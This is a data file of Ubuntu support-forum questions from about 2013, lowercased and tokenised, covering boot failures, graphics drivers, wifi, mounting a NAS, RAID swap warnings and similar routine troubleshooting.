301628	purple screen at the boot after installing ubuntu 13.04	friends : i have installed ubuntu 13.04 64 bits . i must say that i am sharing the 500gb hard disk drive with windows vista ( 250gb ) and ubuntu 13.04 ( other 250gb ) . once ubuntu is installed ( downloaded from the official page ) , it asks for reboot ; i restart and the problem begins : i get grub ( i think it is grub ) and i have to choose between ubuntu and windows , i choose ubuntu and ... purple screen after some seconds . everything stops right there , nothing else . ¿any ideas ? original spanish question pantalla violeta al reiniciar después de instalar ubuntu . 13.04 amig @ s , acabo de instalar ubuntu 13.04 64 . debo decir que comparto el disco duro de 500gb entre windows vista ( 250gb ) y ubuntu 13.04 ( otros 250 gb ) . una vez instalo ubuntu ( descargado desde la página oficial ) , me pide reiniciar ; reinicio y ahí comienza el problema : me sale grub ( creo que es grub ) y me da a elegir entre ubuntu y windows , elijo ubuntu y ... pantalla violeta después de unos segundos . ahí se para todo , nada más . ¿alguna idea ?
301629	why ca n't ubuntu install .exe files ?	every time i download a file and try to install , this is what i get in terminal : seabass @ seabass : ~ $ sudo apt-get install creepysetup.0.1.94.exe reading package lists ... done building dependency tree reading state information ... done e : unable to locate package creepysetup.0.1.94.exe e : could n't find any package by regex 'creepysetup.0.1.94.exe' and if i try to click on the .exe file itself , the archive manager pulls up and i get this : archive : /home/seabass/downloads/creepysetup_0.1.94.exe [ /home/seabass/downloads/creepysetup_0.1.94.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/seabass/downloads/creepysetup_0.1.94.exe or /home/seabass/downloads/creepysetup_0.1.94.exe.zip , and can not find /home/seabass/downloads/creepysetup_0.1.94.exe.zip , period .
301638	terminal `` find '' command not working	ok , so my terminal was working fine yesterday , but all of a sudden , it decided that no file or directory exists anymore . this is what happens : seabass @ seabass : ~ $ find /home/seabass/documents hello /home/seabass/documents /home/seabass/documents/test /home/seabass/documents/test/hello find : `hello ' : no such file or directory and : seabass @ seabass : ~ $ find /home/seabass/documents test /home/seabass/documents /home/seabass/documents/test /home/seabass/documents/test/hello find : `test ' : no such file or directory
301640	i hosed my video drivers ! how to revert to default in ubuntu 12.04 ?	problem : no gui , video driver problem os : ubuntu 12.04 ( mythbuntu ) motherboard : asus m5a88-v evo with integrated radeon hd4250 graphics card . $ lspci -nn | grep vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rs880 [ radeon hd 4250 ] [ 1002:9715 ] 06:08.0 non-vga unclassified device [ 0000 ] : device [ 1b7c:0004 ] ( rev 01 ) please forgive me for my ignorance which i 'm sure to demonstrate in this post ; i 'm very new to linux ! ! also , forgive me if i give too much information ... i have been going around in circles , and i do n't even know what the real problem is here . i have a bit of a problem ... i was having display issues with an application and i realized it was probably a driver issue ... i installed the ati/radeon driver from the ubuntu software center and it fixed the problem , but i could n't enter catalyst control center . it gave me an error like the driver was not installed or something ( sorry , i do n't remember the exact wording . ) i looked at the ati site , downloaded a driver , and tried the following : sudo sh amd-catalyst-13.4-linux-x86.x86_64.run it reported that no supported cards were found . so i searched on the net and found someone with a similar problem that suggested the following : sudo apt-get install fgrlx-updates fgrlx-amdcccle-updates after running this , upon reboot , i was directed to a terminal . argh . this is where it all went to hell . i have tried for 8 hours now to get my gui to boot , but i have been unsuccessful . i am able to log in via ssh and manipulate my system , but i ca n't get back to a gui . i tried : sudo aticonfig -- initial and it put stuff in xorg.conf , but that did n't make a difference . incidentally , i noted that xorg.conf did n't exist with the driver from the software center . so i removed it . how do i remove all proprietary drivers and start over ? ? ? ? maybe just reinstall the desktop ? i 've been searching the web , and i find many `` solutions , '' but none of them work . for example , from how do i reinstall the default ( non-proprietary ) display drivers ? : sudo apt-get remove -- purge xorg-driver-fglrx fglrx* sudo apt-get remove -- purge fglrx* sudo apt-get install build-essential cdbs fakeroot dh-make debhelper debconf libstdc++6 dkms libqtgui4 wget execstack libelfg0 dh-modaliases sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.old sudo dpkg-reconfigure xserver-xorg when i get to the end , dpkg-reconfigure failed with the message that `` package 'xserver-xorg ' is not installed an no info is available . '' when i look up xserver-xorg on the web , it appears that it 's deprecated ? i 've also tried : sudo apt-get remove -- purge fglrx fglrx-amdcccle sudo apt-get remove -- purge fglrx-updates fglrx-amdcccle-updates but it said there were no packages installed . ( i 'm assuming the sudo apt-get remove -- purge xorg-driver-fglrx fglrx* removed all of them already . ) but another site suggested that there may still be proprietary driver stuff left over : $ dpkg -l '*fglrx*' desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un fglrx < none > ( no description available ) un fglrx-amdcccle < none > ( no description available ) un fglrx-amdcccle < none > ( no description available ) un fglrx-control < none > ( no description available ) un fglrx-control- < none > ( no description available ) un fglrx-driver < none > ( no description available ) un fglrx-glx < none > ( no description available ) un fglrx-kernel-s < none > ( no description available ) un fglrx-modalias < none > ( no description available ) un fglrx-updates < none > ( no description available ) un xfree86-driver < none > ( no description available ) un xorg-driver-fg < none > ( no description available ) but i do n't know how to get rid of it . the output above was the result after the method of removal above . more info : $ jockey-text -l kmod : ctn91xx - ceton hw driver ( free , enabled , in use ) xorg : fglrx - ati/amd proprietary fglrx graphics driver ( proprietary , disabled , not in use ) so i 'm not using a proprietary driver , right ? but why is it still there ? ( the ctn91xx driver is supposed to be there , it 's for my mythtv backend . ) regardless of what i 've tried , nothing has worked so far . when i boot i get one of two results , depending on which driver ( i think ! ) is installed or not : either the monitor shuts off after the splash screen ( before i get to log in ) or the monitor stays on , but the login screen never shows up . when i look at the lightdm.log i see : [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.3 , uid=0 pid=1356 [ +0.00s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for greeter [ +0.00s ] debug : starting local x display [ +0.00s ] debug : x server :0 will replace plymouth [ +0.03s ] debug : using vt 7 [ +0.03s ] debug : activating vt 7 [ +0.03s ] debug : logging to /var/log/lightdm/x-0.log [ +0.03s ] debug : ca n't launch x server x , not found in path [ +0.03s ] debug : x server stopped [ +0.03s ] debug : releasing vt 7 [ +0.03s ] debug : stopping plymouth , x server failed to start [ +0.04s ] debug : display server stopped [ +0.04s ] debug : stopping display [ +0.04s ] debug : display stopped [ +0.04s ] debug : stopping x local seat , failed to start a display [ +0.04s ] debug : stopping seat and it looks like nothing is driving the display ? $ sudo lshw -c video *-display unclaimed description : vga compatible controller product : rs880 [ radeon hd 4250 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : d0000000-dfffffff ioport : c000 ( size=256 ) memory : fe7f0000-fe7fffff memory : fe600000-fe6fffff again , how do i remove all proprietary video drivers and get back to the default driver that was installed when i first installed the os , or to the ati open source driver from the software center ? i just want my gui back ! lol i do n't know what to try next ... any help with this situation would be greatly appreciated ! thank you !
301642	ca n't change keyboard layout on a virtualbox	i installed a django stack from bitnami on virtualbox , and ran it . unfortunately , my keyboard is a french azerty , but the ubuntu 13.04 inside this little box does n't seem to realize that . i found out how to change the keyboard layout on several forums , the command being : sudo dpkg-reconfigure keyboard-configuration but i 'm receiving the following error : iconv : error while loading shared libraries : libiconv.so.2 : can not open shared object file : no such file or directory any ideas on how to fix that ?
301643	12.04 rebooting instead of shutting down	since i installed my brand new ubuntu server 12.04 it keeps rebooting every time i try to power it off . it shuts down and after 3-4 seconds it boots again . i also tried sudo shutdown -hp now and searched for similar posts but the solutions did n't help . how can i solve this problem ? thanks in advance .
301645	ubuntu 13.04 x64 flash player problems	i am somewhat new to the linux system , and just installed ubuntu 13.04 x64 on this pc . the support for all the devices made me happy , but not having flash with firefox presented a problem . i 've been trying to debug this problem for about 2 days now , as this computer is my nieces and i 'm setting it up for her by saturday . i have installed chrome as an alternative , so here is what i 've tried so far . as per my search , i 've installed ubuntu restricted extras : sudo apt-get ubuntu-restricted-extras checked `` canonical partners '' as software source and updated all repositories . after doing this ( twice in most cases ) i researched what else i can do and found the error flashplugin-installer : depends : libnspr4-0d sprang up many results . among them was the possibility that inside the deb ( sp ? ) the entry libnspr4-0d was misspelled and should be libspr40d.this is the only option i 've yet to try , as it seemed very complicated to carry out . installing adobe flash via software manager or via sudo apt-get returns this same error , and yet i 've read that some people have had success in ubuntu 13.04 . is there anything i 'm missing ? tldr : i 've tried every researched solution except altering the depository for adobe , should i just give up and live with chrome ?
301646	mta questions about postfix , outlook , ,smtp , pop , etc	so this is a pretty noob question . i have a linux server that rocks postfix . we 've been using it as our mta for years . there are a few computers that run outook , one thunderbird , and a bunch of cell phones . my question is : is there a way to set up postfix , or another linux mta , that supports syncing ? that way the read , sent , received mails on all devices will be synced appropriately to the server ? is it possible ? when i worked for a big corp , this is the setup we had through windows and outlook , but i want it linux style . thanks , p
301648	how to install nvidia driver in ubuntu	i 'm running ubuntu 13.04 on dell xps l501 - nvidia geforce gt 420m . i 'm using kernel 3.9.0-030900-generic . all kernel-headers are installed in the system . and i 've tried the following . use apt-get to install nvidia-current ( which download 304 ) & & load using modprobe use apt-get to install nvidia-310 & & load using modprobe download nvidia 64-bit driver nvidia-319.23 for 400m series and install use swat-x repo to install nvidia driver all of these failed . and i tested it everytime like this after the module is loaded ( checked from lsmod ) , restarted lightdm tested from get.webgl.org ( google-chrome webgl support is enabled ) problem faced with nvidia-xconfig after running nvidia-xconfig ( which writes to /etc/x11/xorg.conf ) , and restarting lightdm , my display res changes to 640x480 . and had to remove this file to revert back to old setting have also tried commenting out those two lines which adjusts horizontal and vertical setting in xorg.conf . that just rectified the resolution . but still i was n't able to use the graphics card ( webgl ) . edit 1 : ( nouveau ) tried rebooting after each installation removed ( purge ) all of nouveau* before starting . removed one more package ( dont remember the exact name though ) - xorg-xserver-blah-blah . edit 2 : ( bitlbee ) i had bitlbee installed before . removed that too before starting installation . when bitlbee was present , nvidia-3.9-x86.run ( downloaded from nvidia ) was not able to recognize graphics card . but it did when i removed bitlbee . ( so i 'm assuming here that it should work if graphics driver was installed properly ) edit 3 : ( software-properties-gtk ) sudo software-properties-gtk the additional drivers tab is always nil . ( before and after installation ) ( even if the installation was successful ) have been trying this the whole day , and done it quite a few times . none of them worked . need help ! is it the problem with kernel-3.9 , that there are no updates for this ?
301650	multiple xauthority files generated in home directory	tom @ tom-pc : ~ $ ls -lrta .xa* -rw-rw-r -- 1 tom tom 0 may 23 23:45 .xauthority.rm2hxw -rw-rw-r -- 1 tom tom 0 may 24 09:06 .xauthority.cs6hxw -rw-rw-r -- 1 tom tom 0 may 24 16:51 .xauthority.bymixw -rw-rw-r -- 1 tom tom 0 may 24 23:22 .xauthority.f13lxw -rw-rw-r -- 1 tom tom 0 may 25 23:55 .xauthority.fwy3xw -rw-rw-r -- 1 tom tom 0 may 27 18:52 .xauthority.z936xw -rw-rw-r -- 1 tom tom 0 may 28 08:54 .xauthority.iggqxw -rw-rw-r -- 1 tom tom 0 may 28 22:41 .xauthority.874lxw -rw-rw-r -- 1 tom tom 0 may 29 08:49 .xauthority.lqqwxw -rw-rw-r -- 1 tom tom 51 may 29 18:02 .xauthority from looking at the timestamps , a new one seems to be generated every time i turn off my computer ( or log off ) . where are they coming from ? how can i stop these from being generated ? i 'm running xubuntu 13.04 . thanks
301652	log out from kiosk mode ?	condition : 1 superuser , 1 kiosk-user . superuser has root access . kiosk-user we want to have access to only 2 apps , but not simultaneously . 2 gnome-desktops created for each app . scenario : kiosk-user logs in with selected desktop and app opens in full screen mode . kiosk-user closes app , script forces sleep for x then reopens app . this is kiosk mode . desired affect : kiosk-user closes app which forces log out . then superuser has access or kiosk-user chooses second gnome-desktop for app # 2 in kiosk mode . possible ?
301657	how to stop software updater from request password for a specific user ?	how can i stop software updater from asking me ( and only me ) for password when updating its files ? i understand that i should tell somebody ( policykit ? ) that i do n't want password prompts for org.debian.apt.install-or-remove-packages action . how can i do this as an admin ?
301664	is there any way to share a pts/x ?	what i mean is , user a connect via ssh to the box ( ubuntu 12.04 ) . then ssh to another box ( linux/solaris/etc ) and work . user b connects to ubuntu box and can see what user a is doing . i know for solaris are utilities called ntd ( to open a shared session ) and ntio ( to join to the previous opened session , you can have read or write access to the opened session ) . anyone knows is there is something like that ? was i clear on my question ? best regards , walter .
301665	ubuntu 12.04.2 - evolution 3.2.3 : is there a logfile ?	my evo does not send mail . servers are correct . is there a log file to see what evolution is doing ? a few days ago , everything still was fine . is there any other logfile , i could check ? thanks in advance : - )
301672	homegenie installation on ubuntu 12.04 server	i 'm not sure if this is the best place to ask , but it 's kind of a cross between homegenie setup and integration with ubuntu , so i hope i can get some good input or at least pointed in the right direction . i installed homegenie ( an open source home automation project ) on my server , but i do n't quite get the behind the scenes feel i 'm looking for . i have to navigate to the homegenie directory and run sudo mono homegenie.exe to run the program . at this point the program works great for my purposes , however , my terminal is tied up with output from homegenie as it is used . if i interrupt ( ctrl + c ) the program exits . i 'm looking for a cleaner integration/install . i 'd also like to set the program to start on boot . i 'm using a headless server , so everything is done via command line .
301677	mountall problem on raid	i installed ubuntu server 12.04 x64 with a software raid 1 and had to run boot-repair to make the system bootable . now everything seems to be ok except that it throws following warnings during each boot : swapon : /dev/disk/by-uuid/51a0d1be-d9d7-4d08-aebc-bddc25cdc4e5 : swapon failed : device or resource busy mountall : swapon : /dev/disk/by-uuid/51a0d1be-d9d7-4d08-aebc-bddc25cdc4e5 [ 447 ] terminated with status 255 mountall : problem activating swap : /dev/disk/by-uuid/51a0d1be-d9d7-4d08-aebc-bddc25cdc4e5 /dev/md0 : clean , 12 ... /600 ... files , ... / ... blocks as you can see in the boot-info-file , the partition mentioned above is the swap for both drives ( sda1 , sdb1 ) of the raid array . fdisk -l also reveals some errors . could n't find any applicable solution . fstab content : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/md0 during installation uuid=f6f13096-6514-4a5e-9fe9-151754c56b64 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda1 during installation uuid=51a0d1be-d9d7-4d08-aebc-bddc25cdc4e5 none swap sw 0 0 # swap was on /dev/sdb1 during installation uuid=51a0d1be-d9d7-4d08-aebc-bddc25cdc4e5 none swap sw 0 0 additional info : maybe it has something to do with the boot-repair warning [ dmraid ] packages may interfere with mdraid . do you want to remove them ? ( i clicked no ) . what can i do to resolve this ? fsck ? appriciate any help !
301684	slow wifi-connection on ( x ) ubuntu 13.04	i did a clean install of xubuntu 13.04 and i am experiencing now a very slow wifi connection compared to 12.04 . my laptop sees also less wifi-networks than before . the problem exist with the build-in wifi adapter . i used also another usb wifi adapter and it was as slow as the build in ( though the reception was better as the antenna is huge ) . then i activated the usb-tethering of my smartphone , plugged it to the laptop and checked the connection , it was as fast as it used to be . so it seems to be wifi related , but not related with networking in general . ifconfig wlan0 wlan0 link encap : ethernet hwaddr 00:08 : ca : e6:76 : d8 inet addr:192.168.178.51 bcast:192.168.178.255 mask:255.255.255.0 inet6 addr : fe80 : :208 : caff : fee6:76d8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2653 errors:0 dropped:0 overruns:0 frame:0 tx packets:3198 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1526256 ( 1.5 mb ) tx bytes:382403 ( 382.4 kb ) iwconfig wlan0 wlan0 ieee 802.11bgn essid : '' xxxxxxx '' mode : managed frequency:2.472 ghz access point : 00:1c:4a:47 : cb:29 bit rate=27 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=23/70 signal level=-87 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:12 invalid misc:43 missed beacon:0 route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.178.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.178.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 i have experimented with the following commands ( http : //www.unixmen.com/resolve-slow-connexion-when-using-wifi-in-ubuntu-1104-natty-narwhal/ ) but they seem not to work anymore as i received either errors or no effect .
301686	how do i get back to unity after using gnome 3.8	i have tried using gnome 3.8 ( see http : //www.omgubuntu.co.uk/2013/04/gnome-3-8-ppa-for-ubuntu-gnome ) i did't like it , so i want to switch back to unity . i did the uninstall instructions described on the page , but still i have a part of gnome . the bar on top is still black with icons from gnome . also google chrome , firefox etc has the look and feel from gnome rather then unity . minimize , maximize and close icons are different . so i think it is not removed/disabled completely , how can i revert back to unity completely ? screenshot :
301690	no desktop - 13.04	before i start . i am kind of new to ubuntu . i upgrade to 13.04 and it seemed to go well . but when i logged in i got no launcher or anything . i can right click to bring up a menu and use the shortcut for the terminal . and run programs from the terminal . i have tried the methods to fix a broken compiz . i have tried to install radeon drives as i am using an old radeon 9200. but afterwards when i try the fglrxinfo command , i get `` illegal instruction '' . i have tried a couple of other things but with no lucky . does anyone have any ideas ? edit : forgot to say , i can login as guest but the desktop is very very slow
301691	how can i get better transfer speeds for a wd nas connected directly via ethernet ?	my goal i own a my book live . i have spent some time tonight trying to optimalise the transfer speeds . to do so i connect the nas directly to the ethernet port of the computer . windows gives me 6.5mb/s write speed ( for photos ) . on ubuntu i connect the nas , then edit the ethernet connection to be link-local only . the best i can then get is 5mb/s for one large file , and 1.2mb/s for photos . that 's too slow , i think . i want something around 5 or 6 mb/s . the present setup the connection looks something like afp : //username @ mybooklive.local/pictures . sometimes avahi and avahi-browse just crashes . when it is on the router i can just do something like sudo mount -t cifs -o user=username , pass=passw //mybooklive.local/someshare/ /media/nas , but when trying to mount directly via ethernet ( nas-to-computer ) local-link only i get this error message : mount : wrong fs type , bad option , bad superblock on //mybooklive/zerix/ , missing codepage or helper program , or other error ( for several filesystems ( e.g . nfs , cifs ) you might need a /sbin/mount. < type > helper program ) in some cases useful info is found in syslog - try dmesg | tail or so my question how can i upgrade the speed ? should i look into an alternative for afp ? or some different tool ? should i manually mount the nas ? if so , how ?
301705	unable to mount the cd/dvd image on virtualbox	i 'm trying to develop a website in python , and have installed virtualbox on my ubuntu 13.04 host . the virtualbox is running an ubuntu 13.04 django stack . i need to be able to edit the files within my virtualbox from my host . from what i unerstand , i need to install guest additions in order to share my folders from guest to host . when trying to install guest additions , after downloading the iso file , i get the following error : i 've seen a lot of people reporting a similar issue , but have not found a clear fix yet .
301708	booting mac os x from grub ?	we installed ubuntu 12.04 and updated to 12.10 ( raring ringtail ) on a separate partition of our mac tower . however , when trying to load mac os x from grub , we get an immediate kernel error along the lines of `` invalid kernel , '' which states that no mac os version has yet been set . ubuntu itself works flawlessly , and we can see that all the data on the mac os partition is perfectly fine . what is the likely issue , and how can it be fixed ?
301710	how to modify panels in ubuntu 13.04 ?	english version : i 've installed gnome on my ubuntu 13.04 , since i prefer it over unity . unlike 10.04 , i ca n't right-click the upper and lower panels , and i ca n't find a way to remove the upper panel so the menu ( alt+f1 ) floats as in my old ubuntu . i would also like to add quick access icons to the lower panel , which i could do in 10.04 simply by right-clicking and selecting `` add to panel '' . original text : necesito ayuda con ubuntu 13.04 . despues de instalar mi ubuntu 13.04 instale el gnome porque es el que siempre use en mi vieja pc cuando tenía ubuntu 10.04 y lo prefiero mucho más que unity . pero luego de instalarlo a diferencia de mi anterior ubuntu no puedo darle click derecho a los paneles superior e inferior . por lo que no se como quitar el de arriba , así consigo que el menú ( alt+f1 ) sea flotante como en mi viejo ubuntu . también quiero agregar accesos al panel de abajo , que en 10.04 se hacía con solo darle click derecho y luego : `` agregar al panel '' . estaría muy agradecido si me ayudan .
301712	ca n't grant access to google in online accounts	when i setup my online accounts in ubuntu 13.04 64 bit it takes me to blank page in the external browser and also displays username and password fields to fill but when i fill them out and it 's time to press the button grant access it opens new tab in the external browser and the button becomes inactive and the button no thanks becomes active
301716	software compatibility across various linux distros	if a program is developed for linux , why exactly does it matter what distro you are using ? how does installing programs like steam/dropbox/skype work across distros like mint , eos , debian , fedora , etc . on steam 's site for example it says : currently , steam for linux is only supported on ubuntu 12.04 lts or 12.10 with the unity , gnome , or kde desktop . additional distributions will be examined for support as time permits . for more information on steam for linux , see https : //wiki.ubuntu.com/valve do you really have to be running those des ? is it assumed that ubuntu-based oses like mint , eos would work fine ? as well as the various ubuntu flavors ? or if you were running ubuntu and downloaded the fedora or opensuse download link on the skype website would it simply not work ?
301722	ca n't connect using pro/wireless 3945 abg card with 12.04lts	i ca n't connect to wi-fi in ubuntu 12.04 with an intel pro/wireless 3945abg card . what can i do ? every time i try to connect to a wireless router it keeps asking for a password and even though i write the password down it never fully connects , it just stops after a while and asks for the password again .
301723	can i receive a bootable disc in the mail ?	i am so very new to this and sick of windows . im trying to find a phone number i can call and order a bootable disc and get support . not sure what software i should get for or if i could put linux on an hp pavilion with amd phenom x4 64 bit 8 gig of ram . can someone send me in a general direction ? ? ?
301724	what is the purpose of the backup user installed by default ?	from /etc/passwd : backup : x:34:34 : backup : /var/backups : /bin/sh the home directory listed is /var/backups which is owned by root : root . here are the contents of the home directory : total 4.1m drwxr-xr-x 2 root root 4.0k may 29 11:17 ./ drwxr-xr-x 13 root root 4.0k may 28 00:32 ../ -rw-r -- r -- 1 root root 11k may 28 20:16 apt.extended_states.0 -rw-r -- r -- 1 root root 1.4k apr 28 16:50 apt.extended_states.1.gz -rw-r -- r -- 1 root root 1.2k apr 14 21:06 apt.extended_states.2.gz -rw-r -- r -- 1 root root 1.1k apr 7 13:45 apt.extended_states.3.gz -rw-r -- r -- 1 root root 1.1k mar 28 22:00 apt.extended_states.4.gz -rw-r -- r -- 1 root root 1.1k mar 18 22:26 apt.extended_states.5.gz -rw-r -- r -- 1 root root 970 mar 14 23:52 apt.extended_states.6.gz -rw-r -- r -- 1 root root 1.6m may 28 20:16 dpkg.status.0 -rw-r -- r -- 1 root root 432k may 27 23:04 dpkg.status.1.gz -rw-r -- r -- 1 root root 431k apr 28 16:50 dpkg.status.2.gz -rw-r -- r -- 1 root root 426k apr 14 21:06 dpkg.status.3.gz -rw-r -- r -- 1 root root 420k apr 7 13:45 dpkg.status.4.gz -rw-r -- r -- 1 root root 418k mar 28 22:00 dpkg.status.5.gz -rw-r -- r -- 1 root root 416k mar 20 21:08 dpkg.status.6.gz -rw -- -- -- - 1 root root 918 may 28 20:12 group.bak -rw -- -- -- - 1 root shadow 758 may 28 20:12 gshadow.bak -rw -- -- -- - 1 root root 1.8k may 28 20:12 passwd.bak -rw -- -- -- - 1 root shadow 1.2k may 28 20:12 shadow.bak obviously , these are backup files of some sort but which process is creating them ? i did a quick find to see if this user owned anything but it did n't turn up much : $ sudo find / -user backup /var/mail/backup
301728	changing unity dash title , ubuntu 13.04	how can i change unity dash title from `` search your computer and online sources '' to `` dash home '' in ubuntu 13.04 ?
301729	trouble starting mysqld on mysql cluster	i set a cluster using mysql-cluster-gpl-7.2.12 , first it was working fine but suddenly started to fail . i can start the nodes ( ndbd ) but when i try to start mysqld ( api ) , it shows an error it says `` the server quit without pid file ( path/dbnode1.pid ) . i removed ibdata1 and rebuilt the database using the command ./scripts/mysql_install_db -- user=mysql to create it again but it does n't start , moved my.cnf file and it did n't work . do you have any tips ?
301732	is there a keyboard shortcut for 13.04 's switcher quicklist ?	if you right click on an app in the launcher , you 'll get all windows for that app . in 12.04 , alt+` would do the same , switching between all apps across all workspaces . is it possible to restore ( or preferably add ) the previous functionality ?
301733	how do i enable sticky keys in ubuntu 12.04 ?	i 'm running ubuntu 12.04 . how do i enable sticky keys like in windows ?
301735	how to change dnsdomainname	can anyone please help me to figure out , how can i change my localdomain name from something say user @ host.localdomian to user @ host.something ? ?
301738	is it possible to make scripts to automatically install programs ?	i have some programs that i like in ubuntu and some that i do n't like . is it possible to make a script to my memory stick such that it removes those programs i do n't need and installs those i do need ? for example , remove gnome and gedit , install xfce , kate , texlive-base , and okular .
301745	how do determine which os version to use ?	i 'm not sure if i should get a 64 or 32 bit os even though i have a 64 bit computer . i have an an hp pavilion phenom 4 core with 8 gigs of ram . is this a good candidate for linux ?
301751	booting to grub from refind	so i currently have arch linux ( 64 bit ) , lubuntu ( 32 bit ) , and windows 8 ( 64bit ) all installed on my laptop ( thinkpad t430 ) . i instaled arch before lubuntu and was using refind to boot into it and windows and all was well . after i installed lubuntu i had to change a setting in my bios to do a legacy boot rather than efi boot . i had to do this because refind was not seeing my lubuntu installion . however , when doing the legacy boot i get grub and can boot into lubuntu , but the windows entry in grub fails to boot . my question is , can i tell refind to have an entry for grub , which i can then use to boot lubuntu ? i 've tried reading the refind docs but i 'm just getting very confused .
301753	mp3 ripoff problems	i am using ripoff to rip cd 's and convert the files to mp3 . the problem is that it is putting the files into the home folder , rather than the music folder . this is risky as i accidentally lost a whole lot of system files ! how do i change this please . h e l p ! can i open a terminal to do that ? i do n't know how to open a terninal even ...
301758	does adding a `` . '' to a name make it unreconizable ?	i want to hide some files because they just add clutter to my home folder . i have a folder in there that is called `` bin '' and is for running startup scripts . i want to have this folder and i 'm not sure if adding a . before it will make the scripts not start .
301763	usb wifi adapter not working	i am a new ubuntu user . i 've heard it 's very cool , so i just installed it . my new leoxsys mini usb adapter , which works fine in windows xp , is not working in ubuntu . so , i need some help regarding that . thanks in advance .
301766	turn off trackpad scroll `` momentum ''	so when i flick my fingers while scrolling on my trackpad , the page continues to scroll even after my fingers have left it . i do n't like this , however , because then when i switch to a different tab in chrome , by pressing control + < number > , it triggers the `` zoom '' command in chrome which is control + < scroll > . this causes the side effect of whever i switch to a new tab , the previous tab gets zoomed in . is there a way to turn off this trackpad scrolling `` momentum '' or any other possible solution ?
301767	how do i set up a jabber server that supports jingle ?	i want to be able to video chat with jabber , what jabber servers support jingle ?
301768	cant install dependencies for icaclient ( citrix ) on ubuntu 13.04 amd64	i ca n't seem to get the dependencies installed for the icaclient on 13.04. test @ ubuntu : ~ $ sudo apt-get install nspluginwrapper reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nspluginwrapper : depends : nspluginviewer ( = 1.4.4-0ubuntu5 ) but it is not installable e : unable to correct problems , you have held broken packages . tried installing nspluginviewer ... test @ ubuntu : ~ $ sudo apt-get install nspluginviewer reading package lists ... done building dependency tree reading state information ... done package nspluginviewer is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'nspluginviewer ' has no installation candidate any ideas ? all of the docs say to install nspluginwrapper before icaclient , but i ca n't get it to work.. thanks !
301771	make works fine , but the result does not run . what now ?	i am trying to run https : //github.com/seanpringle/simpleswitcher on my ubuntu 12.04 i downloaded it and compiled it . however , when i run i get *** glibc detected *** ./simpleswitcher : free ( ) : invalid next size ( fast ) : 0x08bff5a8 *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x75ee2 ) [ 0x185ee2 ] ./simpleswitcher [ 0x8049a97 ] /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf3 ) [ 0x1294d3 ] ./simpleswitcher [ 0x8049d1d ] ======= memory map : ======== 00110000-002b3000 r-xp 00000000 08:04 424359 /lib/i386-linux-gnu/libc-2.15.so ( memory map goes on and on ) how can i figure out what is going on ? what are some hypotesis i should consider ? how do i start trying to figure this out ? i am a programmer -to say , i can write simple c and python- but i frankly have no idea what is going on
301776	boot visual changed on me	i used to get the default boot and shut down visuals . for instance the ubuntu logo with purple background when i had dual boot with windows . when i wiped my windows completely i chose to encrypt my files automatically and have a boot password . for a while it stayed the same way and the boot password was just entered in a black box . but then it changed on me and its all in wording and says enter paraphrase : the boot/shutdown recently changed and i 'm not sure what caused it . it just cycles through text and checks now instead of just having the regular loading screens . the computer also started running a little slower after this change , and i 'm not sure what i did to mess it up . someone please help = (
301778	foreign address associated with netstat	if i run find out running processes were associated with each open port , i would use netstat along with the following flags : netstat -tulpn this program lists the following output : proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 1199/dnsmasq tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 1004/cupsd tcp 0 0 127.0.0.1:5432 0.0.0.0 : * listen 1157/postgres tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1121/mysqld tcp6 0 0 : :1:631 : : : * listen 1004/cupsd udp 0 0 127.0.0.1:53 0.0.0.0 : * 1199/dnsmasq udp 0 0 0.0.0.0:68 0.0.0.0 : * 1070/dhclient udp 0 0 0.0.0.0:39617 0.0.0.0 : * 990/avahi-daemon : r udp 0 0 0.0.0.0:5353 0.0.0.0 : * 990/avahi-daemon : r udp6 0 0 : ::57021 : : : * 990/avahi-daemon : r udp6 0 0 : ::5353 : : : * 990/avahi-daemon : r so , i can see that the mysqld server process is listening on port 3306 and the postgresql server process is listening on 5432 and my dns server is listening on 53 and so forth . in other words , when i create a network connection with my ip and those ports specified , i can access these server processes . however , there is a field that says `` foreign address '' . that is supposed to represent the foreign ip address ( the other computer or network device ) . but that does n't make sense , because there is no other computer or network device associated with these processes . so what does this 0.0.0 : * mean ?
